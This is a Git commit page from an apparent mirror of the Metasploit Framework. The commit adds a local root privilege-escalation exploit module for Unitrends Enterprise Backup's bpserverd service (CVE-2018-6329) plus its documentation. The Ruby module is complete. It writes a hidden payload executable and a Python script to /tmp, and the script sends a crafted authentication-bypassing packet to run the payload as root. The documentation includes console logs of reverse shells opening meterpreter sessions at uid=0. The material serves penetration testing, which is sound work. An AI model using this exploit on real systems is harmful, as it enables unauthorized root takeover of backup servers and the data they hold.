infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9946 a UEB local priv escalation

4.x
h00die 2018-11-27 21:19:34 -05:00 committed by Metasploit
parent d05cc4a3ac
commit f23774d62e
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 255 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

95
documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb Normal file
View File

@ -0,0 +1,95 @@
## Vulnerable Application
It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`,
has an issue in which its authentication can be bypassed. A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
This is very similar to `exploits/linux/misc/ueb9_bpserverd` however it runs against the
`localhost` by dropping a python script on the local file system. Unitrends stopped
`bpserverd` from listening remotely on version 10.
## Vulnerable Application
This module has been tested successfully on:
* UEB 9.2
* UEB 10.0
## Verification Steps
1. Get a user shell with `exploit/linux/http/ueb_api_rce` with `set target 1`
2. ```use exploit/linux/local/ueb_bpserverd_privesc ```
3. ```set session [SESSION]```
4. ```exploit```
5. A root meterpreter session should have been opened successfully
## Scenarios
### UEB 10.0 on CentOS 6.5
```
msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit
[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
### UEB 9.2 on CentOS 6
```
resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
resource (ueb_priv.rb)> set rhost 1.1.1.1
rhost => 1.1.1.1
resource (ueb_priv.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (ueb_priv.rb)> set target 1
target => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress - 19.76% done (164/830 bytes)
[*] Command Stager progress - 39.16% done (325/830 bytes)
[*] Command Stager progress - 56.87% done (472/830 bytes)
[*] Command Stager progress - 74.82% done (621/830 bytes)
[*] Command Stager progress - 92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
[*] Command Stager progress - 126.63% done (1051/830 bytes)
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer : 1.1.1.1
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > background
[*] Backgrounding session 1...
resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
resource (ueb_priv.rb)> set session 1
session => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
[*] Writing privesc script to '/tmp/.sDjn0m'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

160
modules/exploits/linux/local/ueb_bpserverd_privesc.rb Normal file
View File

@ -0,0 +1,160 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info, {
'Name' => 'Unitrends Enterprise Backup bpserverd Privilege Escalation',
'Description' => %q{
It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
has an issue in which its authentication can be bypassed. A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the
localhost by dropping a python script on the local file system. Unitrends stopped
bpserverd from listening remotely on version 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Cale Smith', # @0xC413
'Benny Husted', # @BennyHusted
'Jared Arave', # @iotennui
'h00die' # msf adaptations
],
'DisclosureDate' => 'Mar 14 2018',
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000005691'],
['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'],
['EDB', '44297'],
['CVE', '2018-6329']
],
'Targets' =>
[
[ 'UEB <= 10.0', { } ]
],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0
}
))
register_advanced_options([
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]),
OptInt.new("BPSERVERDPORT", [true, "Port bpserverd is running on", 1743])
])
end
def exploit
pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
print_status("Writing payload executable to '#{exe_path}'")
write_file(exe_path, pl)
#register_file_for_cleanup(exe_path)
pe_script = %Q{
import socket
import binascii
import struct
import time
import sys
RHOST = '127.0.0.1'
XINETDPORT = #{datastore['BPSERVERDPORT']}
cmd = "#{exe_path}"
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];data='';begin=time.time()
while 1:
#if you got some data, then break after wait sec
if total_data and time.time()-begin>timeout:
break
#if you got no data at all, wait a little longer
elif time.time()-begin>timeout*2:
break
try:
data=the_socket.recv(8192)
if data:
total_data.append(data)
begin=time.time()
else:
time.sleep(0.1)
except:
pass
return ''.join(total_data)
print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
try:
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((RHOST,XINETDPORT))
except:
print "[!] Failed to connect!"
exit()
data = s1.recv(4096)
bpd_port = int(data[-8:-3])
try:
pass
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((RHOST, bpd_port))
except:
print "[!] Failed to connect!"
s1.close()
exit()
print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
print "[+] '{0}'".format(cmd)
cmd_len = chr(len(cmd) + 3)
packet_len = chr(len(cmd) + 23)
#https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/linux/misc/ueb9_bpserverd.rb#L72
packet = '\\xa5\\x52\\x00\\x2d'
packet += '\\x00' * 3
packet += packet_len
packet += '\\x00' * 3
packet += '\\x01'
packet += '\\x00' * 3
packet += '\\x4c'
packet += '\\x00' * 3
packet += cmd_len
packet += cmd
packet += '\\x00' * 3
s1.send(packet)
data = recv_timeout(s2)
print data
s1.close()
}
pes_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
print_status("Writing privesc script to '#{pes_path}'")
write_file(pes_path, pe_script)
#register_file_for_cleanup(pes_path)
print_status("Fixing permissions")
cmd_exec("chmod +x #{exe_path} #{pes_path}")
vprint_status cmd_exec("python #{pes_path} -c '#{exe_path}'")
end
end